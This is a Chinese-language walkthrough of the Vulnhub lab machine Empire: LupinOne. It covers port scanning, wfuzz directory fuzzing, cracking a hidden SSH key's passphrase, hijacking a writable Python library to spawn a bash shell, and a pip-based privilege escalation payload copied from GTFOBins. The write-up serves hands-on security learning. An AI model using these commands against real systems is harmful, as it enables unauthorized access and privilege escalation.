Vulnhub靶机介绍：

vulnhub是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地VM打开即可，像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机，老样子需要找到flag即可。

Difficulty：Medium

Vulnhub靶机下载：

官网下载： https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip

Vulnhub靶机安装：

下载好了把安装包解压 然后使用VMware打开即可。

Vulnhub靶机漏洞详解：

①：信息收集：

kali里使用arp-scan -l或者netdiscover发现主机

PS：其实打开得时候ip就给了 没给得情况下要扫

渗透机：kali IP ：172.16.5.140 靶机IP ：172.16.5.179

使用命令：nmap -sS -sV -T4 -n -p- 172.16.5.179

使用命令：nmap -p22,80 -sC -sV 172.16.5.179 #可以尝试脚本扫描

访问一下80端口有一张图片，看到80端口就是老样子进行扫描：dirb、dirsearch、whatweb、gobuster等 发现robots.txt文件

没有什么可以利用得信息，进行深度扫描使用wfuzz模糊探测一下

wfuzz -z file,/usr/share/wordlists/wfuzz/general/big.txt --hc 404,403 http://172.16.5.179/\~FUZZ  

可以得到一个账号名：icex64 然后需要私钥登入 而且它藏在了某个地方！
然后继续扫 找到/~secret/.mysecret.txt文件，可以得知这一串是Base58编码

在线Base58解码：http://www.hiencode.com/base58w.html

②：SSH私钥爆破登入：

这里知道了账号但是不知道密码可以使用ssh2john进行破解 提示使用fasttrack这个字典 得到密码为：P@55w0rd!

然后给个权限600 不然登不进去 chomd 600 key 然后尝试登入 登入成功！！

、

③：pip提权：

sudo -l 显示当前用户可以用 sudo 执行那些命令
在家目录下发现arsene用户可以免密执行heist.py文件

python3.9目录下找到webbrowser.py vi编辑webbrowser.py （有写入权限）添加os.system("/bin/bash") 保存退出

sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

现在拿到了arsene用户权限 sudo -l 再次查看可以执行sudo权限得命令 ，发现了pip 提权（第一次用不太会，学一下即可）

直接GTFOBins里面找：https://gtfobins.github.io/gtfobins/pip/

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

至此至此获取到了flag，本篇文章渗透结束 感谢大家的观看！！

Vulnhub靶机渗透总结：

这个靶机难度适中
1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具：nikto，dirb，dirbuster，whatweb等 查看F12源码信息‘
2.Base58编码 ssh2john工具得使用 爆破ssh密码的
3.SSH私钥登入得权限要给 600 不然会报错
4.pip提权使用（第一次用）

Emplre的两篇就完结啦！最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐！！